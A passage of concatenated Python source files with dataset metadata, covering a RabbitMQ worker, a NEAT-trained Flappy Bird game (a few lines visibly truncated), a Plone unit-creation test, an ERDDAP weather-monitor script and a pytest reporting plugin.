logger', default=\"INFO\")\n \n \ndef pika_producer_from_opts(opts):\n log.setLevel(opts.log_level.upper())\n logging.getLogger(\"pika\").setLevel(\"WARN\")\n producer = PikaProducer(opts.host, opts.port,\n opts.user, opts.password,\n opts.vhost,\n {\"queue\":opts.queue, \"durable\": True, \"arguments\":{\"x-max-priority\":10}})\n return producer\n\ndef pika_process_from_opts(opts):\n log.setLevel(opts.log_level.upper())\n logging.getLogger(\"pika\").setLevel(\"WARN\")\n process = PikaProcess(opts.host, opts.port,\n opts.user, opts.password,\n opts.vhost,\n {\"queue\":opts.input_queue, \"durable\": True, \"arguments\":{\"x-max-priority\":10}},\n {\"queue\":opts.success_queue, \"durable\": True, \"arguments\":{\"x-max-priority\":10}},\n {\"queue\":opts.fail_queue, \"durable\": True, 
\"arguments\":{\"x-max-priority\":10}},\n opts.sleep_time)\n return process\n\ndef test_process(pika_process):\n \"\"\"\n The point of this test is to simulate a long running handler.\n Upon receipt of a SIGINT (Ctrl-C) or SIGTERM the pika_process\n should push the current message back to the queue.\n \"\"\"\n def handler(message):\n log.info(\"Handler received message: {}\".format(message))\n time.sleep(1000000)\n pika_process.process(handler)\n\n\nif __name__ == \"__main__\":\n from optparse import OptionParser\n parser = OptionParser()\n #add_pika_process_opts(parser)\n add_pika_producer_opts(parser)\n opts,args = parser.parse_args()\n #process = pika_process_from_opts(opts)\n #test(process)\n producer = pika_producer_from_opts(opts)\n producer.publish([\"these are a\",\"few messages\"])\n\n\n\n \n", "sub_path": "pika_process.py", "file_name": "pika_process.py", "file_ext": "py", "file_size_in_byte": 10219, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 9, "usage_type": "call"}, {"api_name": "pika.PlainCredentials", "line_number": 16, "usage_type": "call"}, {"api_name": "pika.ConnectionParameters", "line_number": 17, "usage_type": "call"}, {"api_name": "pika.BlockingConnection", "line_number": 25, "usage_type": "call"}, {"api_name": "signal.signal", "line_number": 51, "usage_type": "call"}, {"api_name": "signal.SIGTERM", "line_number": 51, "usage_type": "attribute"}, {"api_name": "signal.signal", "line_number": 52, "usage_type": "call"}, {"api_name": "signal.SIGINT", "line_number": 52, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 60, "usage_type": "call"}, {"api_name": "pika.BasicProperties", "line_number": 74, "usage_type": "call"}, {"api_name": "pika.BasicProperties", "line_number": 79, "usage_type": "call"}, {"api_name": "pika.BasicProperties", "line_number": 84, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 91, "usage_type": "call"}, {"api_name": "pika.BasicProperties", "line_number": 146, "usage_type": "call"}, {"api_name": "pika.BasicProperties", "line_number": 150, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 171, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 180, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 198, "usage_type": "call"}, {"api_name": "optparse.OptionParser", "line_number": 204, "usage_type": "call"}]} +{"seq_id": "552648685", "text": "import pygame\nfrom pygame.mask import from_surface\nimport neat\nimport time\nimport os\nimport random\npygame.font.init()\n\n#loading images and setting thee screen\nWIN_WIDTH=500\nWIN_HEIGHT=800\n\n# for the generation\nGEN=0\n\nBIRD_IMAGES=[pygame.transform.scale2x(pygame.image.load(os.path.join(\"images-fb\",\"bird1.png\"))),\n pygame.transform.scale2x(pygame.image.load(os.path.join(\"images-fb\",\"bird2.png\"))),\n pygame.transform.scale2x(pygame.image.load(os.path.join(\"images-fb\",\"bird3.png\")))]\n\nPIPE_IMAGE=pygame.transform.scale2x(pygame.image.load(os.path.join(\"images-fb\",\"pipe.png\")))\nBASE_IMAGE=pygame.transform.scale2x(pygame.image.load(os.path.join(\"images-fb\",\"base.png\")))\nBG_IMAGE=pygame.transform.scale2x(pygame.image.load(os.path.join(\"images-fb\",\"bg.png\")))\n\n# loading the fonts\nSTAT_FONT=pygame.font.SysFont(\"comicsans\",50)\n\nDRAW_LINES=True\n\nclass Bird:\n IMGS=BIRD_IMAGES\n # when we want to 
tilt the bird up and down it nose pointing that way.\n MAX_ROTATION=25\n # rotingn frames each time we want to move teh bird\n ROT_VEL=20\n # how long we show each bird animation\n ANIMATION_TIME=5\n def __init__(self,x,y):\n #def __int__(self,x,y):\n self.x=x\n self.y=y\n # deciding how much the image is tilting\n self.tilt=0\n # Deciding the physics of our bird when we jump or we g down\n self.tick_count=0\n # our velocity\n self.vel=0\n # deciding the height of the bord\n self.height=self.y\n # deciding the amount of images of the bird being displayed\n self.image_count=0\n # setting the initial image of the bird as the first one.\n self.img=self.IMGS[0]\n\n # setting a function which will be useful when we will jump\n def jump(self):\n # the inital velocity for our bird which will be ini upwards direction\n self.vel = -10.5\n # deciding how many times the bird will jump.Initial will be zero\n self.tick_count=0\n # initial height for the bird jump\n self.height=self.y\n\n #calling this method to move the frames in our game\n def move(self):\n # a tick happend and we jumped once\n self.tick_count+=1\n # displacement, this will be the distance our bird will be moving with each jump.\n # This will keep decreasing with each jump.\n d=self.vel*(self.tick_count)+1.5*self.tick_count**2\n\n # limiting thee move down vel to 16 if it is more.\n if d>=16:\n d=16\n\n # setting the jump up vel to be more than we get from above\n if d<0:\n d-=2\n\n # setting the y post of the bord.\n self.y=self.y+d\n\n # checking if we are moving above and tilting\n # the bird only when it has stopped moving up and begun to retrace back down.\n if d<0 or (self.y<(self.height+50)):\n\n # making sure the bird is not tilted the wrong way.\n # also checking where to tilt the bird (up or down)\n if self.tilt-90:\n self.tilt=self.ROT_VEL\n\n # win represents the window on which we draw the bord.\n def draw(self,win):\n # tracking how many times we have shown the image.\n self.image_count+=1\n\n # checking what image of the bord to be shown at what time\n if self.image_count0:\n if len(pipes)>1 and birds[0].x > pipes[0].PIPE_TOP.get_width():\n pipe_ind=1\n else:\n run=False\n break\n\n # for moving the birds\n # we will pass the inputs to Nn which will check the outputs\n # and if the output is greater that 0.5 make the bird jump\n for x, bird in enumerate(birds):\n bird.move()\n # providing the fitness value less as this loop will run 30\n # times a second and if more value is there bird will touch the top screen\n ge[x].fitness+=0.1\n\n # send bird location, top pipe location and bottom pipe location and\n # determine from network whether to jump or not\n output = nets[x].activate(\n (bird.y, abs(bird.y - pipes[pipe_ind].height), abs(bird.y - pipes[pipe_ind].bottom)))\n # making the bird jump\n if output[0]>0.5:\n bird.jump()\n # moving the bird\n #bird.move()\n\n # used for drawing pipes on the screen\n add_pipe=False\n # list which will contain the removed pipes\n rem=[]\n for pipe in pipes:\n for x,bird in enumerate(birds):\n # checking for the collision\n if pipe.collide(bird):\n # if a bird hit a pipe then its fitness level will be decreased\n ge[x].fitness-=1\n birds.pop(x)\n nets.pop(x)\n ge.pop(x)\n\n # used for drawing another pipe on the screen\n if not pipe.passed and pipe.x=730 or bird.y<0:\n birds.pop(x)\n nets.pop(x)\n ge.pop(x)\n\n # moving the base\n base.move()\n\n # drawing the bird\n draw_window(win,birds,pipes,base,score,GEN,pipe_ind)\n\n\n\n\n\n# inputs for the algorithm will be bird y posi, top 
pipe, bottom pipe\n# outputs will be jump or not\n# activation function will be tanh\n# initial no. of birds which will be starting in the beginning.\n# fitness function:- evaluating how good the birds are, the bird that reaches the farthest scores the best.\n# max generation means the maximum value for which we will try before terminating and trying again.\n\ndef run(config_path):\n config = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_path)\n # we have specified the things which we have mentioned in our config file.\n\n p = neat.Population(config)\n # generating the population\n\n p.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n p.add_reporter(stats)\n # this will give us some stats about the fitness and stuff\n\n winner=p.run(main,50)\n # 50 defines the generations which we want to run.\n # this is the fitness function which we will be specifying\n\n\n\n # show final stats\n print('\\nBest genome:\\n{!s}'.format(winner))\n\n\nif __name__==\"__main__\":\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'config-feedforward.txt')\n run(config_path)", "sub_path": "neat-fb-auton.py", "file_name": "neat-fb-auton.py", "file_ext": "py", "file_size_in_byte": 13902, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pygame.font.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale2x", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale2x", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale2x", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale2x", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale2x", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 21, 
"usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale2x", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.transform.rotate", "line_number": 122, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 122, "usage_type": "attribute"}, {"api_name": "pygame.mask.from_surface", "line_number": 132, "usage_type": "call"}, {"api_name": "pygame.transform.flip", "line_number": 148, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 148, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 158, "usage_type": "call"}, {"api_name": "pygame.mask.from_surface", "line_number": 176, "usage_type": "call"}, {"api_name": "pygame.mask.from_surface", "line_number": 177, "usage_type": "call"}, {"api_name": "pygame.draw.line", "line_number": 248, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 248, "usage_type": "attribute"}, {"api_name": "pygame.draw.line", "line_number": 252, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 252, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 260, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 260, "usage_type": "attribute"}, {"api_name": "neat.nn.FeedForwardNetwork.create", "line_number": 276, "usage_type": "call"}, {"api_name": "neat.nn", "line_number": 276, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 286, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 286, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 299, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 299, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 301, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 303, "usage_type": "call"}, {"api_name": "neat.config.Config", "line_number": 397, "usage_type": "call"}, {"api_name": "neat.config", "line_number": 397, "usage_type": "attribute"}, {"api_name": "neat.DefaultGenome", "line_number": 397, "usage_type": "attribute"}, {"api_name": "neat.DefaultReproduction", "line_number": 397, "usage_type": "attribute"}, {"api_name": "neat.DefaultSpeciesSet", "line_number": 398, "usage_type": "attribute"}, {"api_name": "neat.DefaultStagnation", "line_number": 398, "usage_type": "attribute"}, {"api_name": "neat.Population", "line_number": 402, "usage_type": "call"}, {"api_name": "neat.StdOutReporter", "line_number": 405, "usage_type": "call"}, {"api_name": "neat.StatisticsReporter", "line_number": 406, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 421, "usage_type": "call"}, {"api_name": "os.path", "line_number": 421, "usage_type": 
"attribute"}, {"api_name": "os.path.join", "line_number": 422, "usage_type": "call"}, {"api_name": "os.path", "line_number": 422, "usage_type": "attribute"}]} +{"seq_id": "183402556", "text": "from ftw.builder import Builder\nfrom ftw.builder import create\nfrom opengever.base.model import create_session\nfrom opengever.ogds.models.service import ogds_service\nfrom opengever.setup.creation.adminunit import AdminUnitCreator\nfrom opengever.setup.creation.orgunit import OrgUnitCreator\nfrom opengever.testing import FunctionalTestCase\nfrom plone.app.testing import applyProfile\nfrom StringIO import StringIO\nimport json\n\n\nclass TestUnitCreation(FunctionalTestCase):\n\n use_default_fixture = False\n\n def setUp(self):\n super(TestUnitCreation, self).setUp()\n create(Builder('ogds_group').id('users'))\n applyProfile(self.portal, 'opengever.setup.tests:units')\n self.session = create_session()\n\n self.au_data = StringIO(json.dumps([{\n 'unit_id': 'admin',\n 'title': 'AdminUnit',\n 'ip_address': '127.0.0.1',\n 'site_url': 'http://admin.local',\n 'public_url': 'http://admin.local',\n 'abbreviation': 'A',\n }]))\n\n self.ou_data = StringIO(json.dumps([{\n 'unit_id': 'org',\n 'title': 'OrgUnit',\n 'admin_unit_id': 'admin',\n 'users_group_id': 'users',\n 'inbox_group_id': 'users',\n\n }]))\n\n def test_admin_unit_created(self):\n self.assertEqual(1, len(ogds_service().all_admin_units()))\n admin_unit = ogds_service().fetch_admin_unit('admin')\n self.assertIsNotNone(admin_unit)\n\n def test_org_unit_created(self):\n self.assertEqual(1, len(ogds_service().all_org_units()))\n org_unit = ogds_service().fetch_org_unit('org')\n self.assertIsNotNone(org_unit)\n self.assertIsNotNone(org_unit.admin_unit)\n self.assertIsNotNone(org_unit.users_group)\n self.assertIsNotNone(org_unit.inbox_group)\n\n def test_allows_skipping_of_already_existing_units(self):\n au_creator = AdminUnitCreator(skip_if_exists=True)\n au_creator.run(self.au_data)\n self.session.flush()\n\n ou_creator = OrgUnitCreator(skip_if_exists=True)\n ou_creator.run(self.ou_data)\n self.session.flush()\n", "sub_path": "opengever/setup/tests/test_creation.py", "file_name": "test_creation.py", "file_ext": "py", "file_size_in_byte": 2129, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "opengever.testing.FunctionalTestCase", "line_number": 13, "usage_type": "name"}, {"api_name": "ftw.builder.create", "line_number": 19, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 19, "usage_type": "call"}, {"api_name": "plone.app.testing.applyProfile", "line_number": 20, "usage_type": "call"}, {"api_name": "opengever.base.model.create_session", "line_number": 21, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 23, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 23, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 32, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 32, "usage_type": "call"}, {"api_name": "opengever.ogds.models.service.ogds_service", "line_number": 42, "usage_type": "call"}, {"api_name": "opengever.ogds.models.service.ogds_service", "line_number": 43, "usage_type": "call"}, {"api_name": "opengever.ogds.models.service.ogds_service", "line_number": 47, "usage_type": "call"}, {"api_name": "opengever.ogds.models.service.ogds_service", "line_number": 48, "usage_type": "call"}, {"api_name": "opengever.setup.creation.adminunit.AdminUnitCreator", "line_number": 55, 
"usage_type": "call"}, {"api_name": "opengever.setup.creation.orgunit.OrgUnitCreator", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "269572193", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# ### Bits and pieces for Lab Env Monitor\n# \n# *output in jsonp - last measurement*\n\n# In[183]:\n\n\nimport json\nfrom erddapy import ERDDAP\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport urllib.request\n\ntoday = datetime.datetime.utcnow().strftime('%Y-%m-%dT00:00:00Z')\nyesterday = (datetime.datetime.utcnow()-datetime.timedelta(days=1)).strftime('%Y-%m-%dT00:00:00Z')\n\nserver_url = 'http://downdraft.pmel.noaa.gov:8080/erddap'\nrequest_url = '/tabledap/OfficeRedboard_WxStation.jsonlKVP?time%2Ctemperature%2CRH_Percent%2CSLP%2CAltitude%2CUVA%2CUVB%2CUVindex&time%3E=2020-02-26T00%3A00%3A00Z&orderByMax(%22time%22)'\n\njsonout = json.loads(urllib.request.urlopen(server_url+request_url).read())\n\n\n# In[184]:\n\n\njsonout.update({'datetime':datetime.datetime.strptime(jsonout['time'],\n '%Y-%m-%dT%H:%M:%SZ').timestamp()})\njsonout.update({ \"messages\": \"What sort of message would be helpful.\"})\njsonout.update({ \"days\": datetime.datetime.utcnow().day})\n\n\n# In[185]:\n\n\nd = ERDDAP(server=server_url,\n protocol='tabledap',\n response='csv'\n)\nd.dataset_id='OfficeRedboard_WxStation'\n\nd.constraints={'time>=': datetime.datetime.now()-datetime.timedelta(hours=3)}\njsonout.update({\"messages\":\"trends calculated using last 3hrs, red is greater than 1 std change, blue is greater than -1std change\"})\n\ntry:\n df = d.to_pandas(\n\n index_col='time (UTC)',\n parse_dates=True,\n skiprows=(1,) # units information can be dropped.\n )\n\n df.sort_index(inplace=True)\n df.columns = [x[1].split()[0] for x in enumerate(df.columns)]\n df_mean=df.mean()\n\n #temperature\n if (jsonout['temperature'] < (df.mean()['temperature']-df.std()['temperature']) ):\n jsonout.update({\"tempAlert\": \"alert alert-info\"})\n elif (jsonout['temperature'] > (df.mean()['temperature']+df.std()['temperature']) ):\n jsonout.update({\"tempAlert\": \"alert alert-danger\"})\n\n #moisture\n if (jsonout['RH_Percent'] < (df.mean()['RH_Percent']-df.std()['RH_Percent']) ):\n jsonout.update({\"moistAlert\": \"alert alert-info\"})\n elif (jsonout['RH_Percent'] > (df.mean()['RH_Percent']+df.std()['RH_Percent']) ):\n jsonout.update({\"moistAlert\": \"alert alert-danger\"}) \n #pressure\n if (jsonout['SLP'] < (df.mean()['SLP']-df.std()['SLP']) ):\n jsonout.update({\"pressAlert\": \"alert alert-info\"})\n elif (jsonout['SLP'] > (df.mean()['SLP']+df.std()['SLP']) ):\n jsonout.update({\"pressAlert\": \"alert alert-danger\"}) \n #UVA\n if (jsonout['UVA'] < (df.mean()['UVA']-df.std()['UVA']) ):\n jsonout.update({\"UVAAlert\": \"alert alert-info\"})\n elif (jsonout['UVA'] > (df.mean()['UVA']+df.std()['UVA']) ):\n jsonout.update({\"UVAAlert\": \"alert alert-danger\"}) \n #UVB\n if (jsonout['UVB'] < (df.mean()['UVB']-df.std()['UVB']) ):\n jsonout.update({\"UVBAlert\": \"alert alert-info\"})\n elif (jsonout['UVB'] > (df.mean()['UVB']+df.std()['UVB']) ):\n jsonout.update({\"UVBAlert\": \"alert alert-danger\"}) \n #UVindex\n if (jsonout['UVindex'] < (df.mean()['UVindex']-df.std()['UVindex']) ):\n jsonout.update({\"UVindexAlert\": \"alert alert-info\"})\n elif (jsonout['UVindex'] > (df.mean()['UVindex']+df.std()['UVindex']) ):\n jsonout.update({\"UVindexAlert\": \"alert alert-danger\"}) \n\nexcept:\n jsonout.update({\"messages\":\"no data in 3hr window to calculate trends\",\n \"tempAlert\": \"alert alert-warning\",\n 
\"pressAlert\": \"alert alert-warning\",\n \"moistAlert\": \"alert alert-warning\",\n \"UVAAlert\": \"alert alert-warning\",\n \"UVBAlert\": \"alert alert-warning\",\n \"UVindexAlert\": \"alert alert-warning\"})\n\n\n# In[186]:\n\n\nwith open('OfficeEnvMonitor.json', 'w') as my_data_file:\n my_data_file.write(json.dumps(jsonout,indent=0))\n\n\n# In[ ]:\n\n\n\n\n", "sub_path": "swbell/ThingSpeak_Wx/python_src/OfficeEnvMonitor.py", "file_name": "OfficeEnvMonitor.py", "file_ext": "py", "file_size_in_byte": 4017, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "datetime.datetime.utcnow", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 18, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcnow", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 19, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 19, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 24, "usage_type": "call"}, {"api_name": "urllib.request.request.urlopen", "line_number": 24, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 24, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 24, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcnow", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "attribute"}, {"api_name": "erddapy.ERDDAP", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 45, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 45, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "435868077", "text": "import pytest\nimport os\nimport zipfile\nimport json\nimport tempfile\nimport yaml\nimport csv\nimport datetime\nimport hashlib\nimport io\nimport json\nimport os\nimport re\nimport time\n\nfrom boltons import funcutils\n\ntry:\n from html import escape\nexcept ImportError:\n from cgi import escape\nfrom collections import defaultdict\n\nimport docutils.core\nimport jinja2\nimport xlsxwriter\nfrom six import string_types\n\n# noinspection PyUnresolvedReferences\nimport version\nimport logging\n\n\nhelm_packages_list = []\npackage_dir = \"\"\n\noptional_tests_settings = {}\n\n\nlogging.basicConfig(format=\"%(levelname)s:%(message)s\", level=logging.ERROR)\n\n__path__ = [os.path.dirname(os.path.abspath(__file__))]\n\nDEFAULT_OUTPUT_DIR = \"{}/../output\".format(__path__[0])\n\nCNF_REQUIREMENTS_FILE = os.path.join(__path__[0], \"..\", \"cnf_requirements.json\")\n\n\ndef get_output_dir(config):\n \"\"\"\n Retrieve the output directory for the reports and create it if necessary\n :param config: pytest configuration\n :return: output directory as string\n \"\"\"\n output_dir = config.option.output_dir or DEFAULT_OUTPUT_DIR\n if not os.path.exists(output_dir):\n os.makedirs(output_dir, exist_ok=True)\n return output_dir\n\n\nREPORT_COLUMNS = [\n (\"Error #\", \"err_num\"),\n (\"Input File\", \"file\"),\n (\"Requirements\", \"req_description\"),\n (\"Error Message\", \"message\"),\n (\"Test\", \"test_file\"),\n]\n\nCOLLECTION_FAILURE_WARNING = 
\"\"\"WARNING: The following unexpected errors occurred\nwhile preparing to validate the input files. Some validations may not have been\nexecuted. Please refer these issues to the VNF Validation Tool team.\n\"\"\"\n\nCOLLECTION_FAILURES = []\n\n# Captures the results of every test run\nALL_RESULTS = []\n\n\ndef validates(*requirement_ids):\n \"\"\"Decorator that tags the test function with one or more requirement IDs.\n\n Example:\n >>> @validates('R-12345', 'R-12346')\n ... def test_something():\n ... pass\n >>> assert test_something.requirement_ids == ['R-12345', 'R-12346']\n \"\"\"\n # pylint: disable=missing-docstring\n def decorator(func):\n # NOTE: We use a utility here to ensure that function signatures are\n # maintained because pytest inspects function signatures to inject\n # fixtures. I experimented with a few options, but this is the only\n # library that worked. Other libraries dynamically generated a\n # function at run-time, and then lost the requirement_ids attribute\n @funcutils.wraps(func)\n def wrapper(*args, **kw):\n return func(*args, **kw)\n\n wrapper.requirement_ids = requirement_ids\n return wrapper\n\n decorator.requirement_ids = requirement_ids\n return decorator\n\n\ndef extract_error_msg(rep):\n \"\"\"\n If a custom error message was provided, then extract it otherwise\n just show the pytest assert message\n \"\"\"\n if rep.outcome != \"failed\":\n return \"\"\n try:\n full_msg = str(rep.longrepr.reprcrash.message)\n match = re.match(\n \"AssertionError:(.*)^assert.*\", full_msg, re.MULTILINE | re.DOTALL\n )\n if match: # custom message was provided\n # Extract everything between AssertionError and the start\n # of the assert statement expansion in the pytest report\n msg = match.group(1)\n elif \"AssertionError:\" in full_msg:\n msg = full_msg.split(\"AssertionError:\")[1]\n else:\n msg = full_msg\n except AttributeError:\n msg = str(rep)\n\n return msg\n\n\nclass TestResult:\n \"\"\"\n Wraps the test case and result to extract necessary metadata for\n reporting purposes.\n \"\"\"\n\n RESULT_MAPPING = {\"passed\": \"PASS\", \"failed\": \"FAIL\", \"skipped\": \"SKIP\"}\n\n def __init__(self, item, outcome):\n self.item = item\n self.result = outcome.get_result()\n self.files = self._get_files()\n self.error_message = self._get_error_message()\n\n @property\n def requirement_ids(self):\n \"\"\"\n Returns list of requirement IDs mapped to the test case.\n\n :return: Returns a list of string requirement IDs the test was\n annotated with ``validates`` otherwise returns an empty list\n \"\"\"\n is_mapped = hasattr(self.item.function, \"requirement_ids\")\n return self.item.function.requirement_ids if is_mapped else []\n\n @property\n def markers(self):\n \"\"\"\n :return: Returns a set of pytest marker names for the test or an empty set\n \"\"\"\n return set(m.name for m in self.item.iter_markers())\n\n @property\n def is_base_test(self):\n \"\"\"\n :return: Returns True if the test is annotated with a pytest marker called base\n \"\"\"\n return \"base\" in self.markers\n\n @property\n def is_failed(self):\n \"\"\"\n :return: True if the test failed\n \"\"\"\n return self.outcome == \"FAIL\"\n\n @property\n def outcome(self):\n \"\"\"\n :return: Returns 'PASS', 'FAIL', or 'SKIP'\n \"\"\"\n return self.RESULT_MAPPING[self.result.outcome]\n\n @property\n def test_case(self):\n \"\"\"\n :return: Name of the test case method\n \"\"\"\n return self.item.function.__name__\n\n @property\n def test_module(self):\n \"\"\"\n :return: Name of the file containing the test 
case\n \"\"\"\n return self.item.function.__module__.split(\".\")[-1]\n\n @property\n def test_id(self):\n \"\"\"\n :return: ID of the test (test_module + test_case)\n \"\"\"\n return \"{}::{}\".format(self.test_module, self.test_case)\n\n @property\n def raw_output(self):\n \"\"\"\n :return: Full output from pytest for the given test case\n \"\"\"\n return str(self.result.longrepr)\n\n def requirement_text(self, curr_reqs):\n \"\"\"\n Creates a text summary for the requirement IDs mapped to the test case.\n If no requirements are mapped, then it returns the empty string.\n\n :param curr_reqs: mapping of requirement IDs to requirement metadata\n loaded from the VNFRQTS projects needs.json output.\n Right now the metadata is loaded from a custom json file with dummy IDs as VNFRQTS is only for VNFs.\n :return: ID and text of the requirements mapped to the test case\n \"\"\"\n text = (\n \"\\n\\n{}: \\n{}\".format(r_id, curr_reqs[r_id][\"description\"])\n for r_id in self.requirement_ids\n if r_id in curr_reqs\n )\n return \"\".join(text)\n\n def requirements_metadata(self, curr_reqs):\n \"\"\"\n Returns a list of dicts containing the following metadata for each\n requirement mapped:\n\n - id: Requirement ID\n - text: Full text of the requirement\n - keyword: MUST, MUST NOT, MAY, etc.\n\n :param curr_reqs: mapping of requirement IDs to requirement metadata\n loaded from the VNFRQTS projects needs.json output\n Right now the metadata is loaded from a custom json file with dummy IDs as VNFRQTS is only for VNFs.\n :return: List of requirement metadata\n \"\"\"\n data = []\n for r_id in self.requirement_ids:\n if r_id not in curr_reqs:\n continue\n data.append(\n {\n \"id\": r_id,\n \"text\": curr_reqs[r_id][\"description\"],\n \"keyword\": curr_reqs[r_id][\"keyword\"],\n }\n )\n return data\n\n def _get_files(self):\n \"\"\"\n Extracts the list of files passed into the test case.\n :return: List of absolute paths to files\n \"\"\"\n parts = self.result.nodeid.split(\"[\")\n return [\"\"] if len(parts) == 1 else [os.path.basename(parts[1][:-1])]\n\n def _get_error_message(self):\n \"\"\"\n :return: Error message or empty string if the test did not fail or error\n \"\"\"\n if self.is_failed:\n return extract_error_msg(self.result)\n else:\n return \"\"\n\n\n# noinspection PyUnusedLocal\n@pytest.hookimpl(tryfirst=True, hookwrapper=True)\ndef pytest_runtest_makereport(item, call):\n \"\"\"\n Captures the test results for later reporting. 
